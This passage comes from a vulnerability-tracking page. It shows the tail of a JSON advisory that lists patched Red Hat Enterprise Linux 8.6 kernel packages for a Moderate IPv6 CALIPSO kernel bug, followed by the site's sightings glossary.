            "BaseOS-8.6.0.Z.E4S:kernel-debuginfo-common-ppc64le-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-debuginfo-common-s390x-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-debuginfo-common-x86_64-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-devel-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-devel-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-devel-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-devel-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-doc-0:4.18.0-372.185.1.el8_6.noarch",
            "BaseOS-8.6.0.Z.E4S:kernel-modules-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-modules-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-modules-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-modules-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-modules-extra-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-modules-extra-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-modules-extra-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-modules-extra-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-tools-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-tools-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-tools-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-tools-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-tools-debuginfo-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-tools-debuginfo-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-tools-debuginfo-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-tools-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-tools-libs-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-tools-libs-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-tools-libs-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-zfcpdump-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-zfcpdump-core-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-zfcpdump-debuginfo-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-zfcpdump-devel-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-zfcpdump-modules-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-zfcpdump-modules-extra-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:perf-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:perf-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:perf-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:perf-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:perf-debuginfo-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:perf-debuginfo-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:perf-debuginfo-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:perf-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:python3-perf-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:python3-perf-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:python3-perf-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:python3-perf-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:python3-perf-debuginfo-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:python3-perf-debuginfo-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:python3-perf-debuginfo-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:python3-perf-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:bpftool-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:bpftool-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-0:4.18.0-372.185.1.el8_6.src",
            "BaseOS-8.6.0.Z.TUS:kernel-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-abi-stablelists-0:4.18.0-372.185.1.el8_6.noarch",
            "BaseOS-8.6.0.Z.TUS:kernel-core-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-debug-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-debug-core-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-debug-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-debug-devel-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-debug-modules-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-debug-modules-extra-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-debuginfo-common-x86_64-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-devel-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-doc-0:4.18.0-372.185.1.el8_6.noarch",
            "BaseOS-8.6.0.Z.TUS:kernel-modules-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-modules-extra-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-tools-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-tools-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-tools-libs-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:perf-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:perf-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:python3-perf-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:python3-perf-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Moderate"
        }
      ],
      "title": "kernel: ipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr()"
    }
  ]
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.


Loading…

Loading…

Loading…

Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.


Loading…

Detection rules are retrieved from Rulezet.

Loading…

Loading…